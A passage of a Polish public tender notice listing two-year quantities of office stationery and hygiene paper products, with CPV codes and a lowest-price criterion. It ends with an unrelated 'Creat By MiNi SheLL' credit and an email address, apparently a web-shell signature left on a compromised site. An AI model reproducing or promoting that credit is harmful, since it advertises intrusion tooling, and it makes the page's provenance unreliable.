27	Zszywacz biurowy z długim ramieniem, zszywanie do 130 kartek, regulowana głębokość wsunięcia do 70mm, na zszywki 24/6 i 26/6; gwarancja min.3 lata	4 szt.
28.	Zszywki biurowe 1 op.= 1000 szt. rozmiar:	
	24/6	1.440 opakowań
	26/6	 48 opakowań
29.	Dziurkacz biurowy, metalowa konstrukcja, duża dźwignia, ma dziurkować min. 30 kartek jednorazowo; gwarancja min. 3 lata	48 szt.
30.	Długopis jednorazowy kolor: niebieski, czarny, czerwony, zielony, żłobiony w miejscu chwytania	2.400 szt.
31.	Długopis żelowy, z gumowym uchwytem, grubość linii pisania 0,3-0,32mm, długość linii min. 1.200m, kolor niebieski, czarny	240 szt.
32.	Flamaster biurowy kolor: czerwony, czarny, niebieski, zielony	2.400 szt.
33.	Cienkopis, grubość linii pisania 0,4mm, kolor: niebieski, czarny, czerwony, zielony	720 szt.
34.	Marker permanentny , wodoodporny, do pisania na każdej powierzchni- w tym na tkaninie	1.200 szt.
35.	Foliopis do pisania na szkle, foli, kliszy, płycie CD, grubość linii pisania 0,4-0,6mm	1.200 szt.
36.	Marker cienkopiszący olejowy do znakowania na powierzchniach szorstkich i gładkich, wodoodporny i odporny na ścieranie, kolor biały i czarny, końcówka okrągła	144 szt.
37.	Ołówek, twardość HB	480 szt.
38.	Linijka z tworzywa długość 25-30cm	120 szt.
39.	Linijka z tworzywa długość 50 cm	48 szt.
40.	Kalka przebitkowa ( maszynowa)A4 1 op.= 50 szt.	48 opakowań
41.	Kalka przebitkowa ( maszynowa) A 3 1 op.= 100 szt.	24 opakowań
42.	Gumka ołówkowa- mała	120 szt.
43.	Temperówka plastikowa- jednotorowa	120 szt.
44.	Koperty C-6 listowe, samoklejące, białe	72.000 szt.
45.	Koperty B-5, samoklejące, brązowe lub szare	72.000 szt.
46.	Koperty C-4, samoklejące, brązowe	12.000 szt.
47.	Koperty C-4 samoklejące, białe	12.000 szt.
48.	Koperty B-4samoklejące, białe, z rozszerzonymi bokami i spodem	1.200 szt.
49.	Koperta B-4 samoklejące, białe	1.200 szt.
50.	Koperta z folią bąbelkową wymiar zew. 290x370mm	240 szt.
51.	Kopera z folią bąbelkową wymiar zew. 200x275mm	240 szt.
52.	Zeszyt A4; 96-100 kartek (ekologiczny), krata, okładka miękka	1.200 szt.
53.	Zeszyt A4; 96-100 kartek (ekologiczny), krata, okładka twarda	240 szt.
54.	Zeszyt A5; 80 kartek ( ekologiczny), krata, okładka miękka	1.200 szt.
55.	Skorowidz szyty, rozmiar 2/3 A4, ok. 100 kartek	48 szt.
56.	Skorowidz szyty A4, ok. 100 kartek	20 szt.
57.	Dyskietki formatowane 3,5 MF 2 HD, w pudełku kartonowym, 1 op.= 10 szt.	360 opakowań
58.	Płyta CD-R, pojemność 700 MB	16.800 szt.
59.	Płyta CD-Rw wielokrotnego zapisu, pojemność 700 MB	2.400 szt.
60.	Płyta DVD + R, pojemność 4,7GB	720 szt.
61.	Płyta EMTEC CD-Rw, 700 MB, 80min.	240 szt.
62.	Taśma do metkownicy, 1-rzędowa, półokrągła, kolorowa	240 rolek
63.	Naklejka - cena, taśma na rolce	720 rolek
64.	Nożyczki biurowe ze stali nierdzewnej, rękojeść z niełamliwego plastiku, długość 16cm	24 szt.
65.	Grzbiety do bindowania dokumentów, długość do formatu A4, szerokość grzbietu	
	32mm	1.440
	25mm	1.440
	21mm	1.440
	16mm	2.880
	12,5mm	2.880
	8,00mm	2.880
	6,00mm	2.880
66.	Okładki do bindowania, format A4:	
	- wierzchnia foliowa, przezroczysta	15.840 szt.
	- spodnia ze sztywnego kartonu	15.840 szt.
67.	Folia do laminacji, grubość folii 100 mikronów:	
	Format A4	1.920 szt.
	Format A3	720 szt.
	Format A5	1.440 szt.
	Rozmiar 75x 105mm	960 szt.
Orientacyjne zapotrzebowanie na okres 2 lat.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres nr 2- Artykuły higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Ilość
1.	Papier toaletowy- jednowarstwowy , na rolce, gatunek I, długość 35m?5%, średnica rolki- min. 10cm, średnica tulei- max.4,5cm	60.000 szt.
2.	Ręcznik papierowy kuchenny- dwuwarstwowy, gofrowany, kolor biały lub biały z nadrukiem; 1 op.= 2 rolki	9.600 opakowań
3.	Ręcznik papierowy, składany w Z gofrowany, wymiary 25x23 cm, pojedynczy, kolor biały, 1 op.= 200szt.; w opakowaniach zbiorczych po 4 lub 5 tyś .szt.	36.000 op.
( opakowanie po 200 szt.)
4.	Ręcznik przemysłowy, jednorazowy na rolce bezpyłowy, biały, waga min.4,25kg	288 rolek
5.	Ręcznik jednorazowy maxi, 1- warstwowy, biały na rolce, szerokość rolki 20cm?2cm, ciężar min. 1,5kg, długość min.320mb	960 szt.
Orientacyjne zapotrzebowanie na okres 2 lat.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.77.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com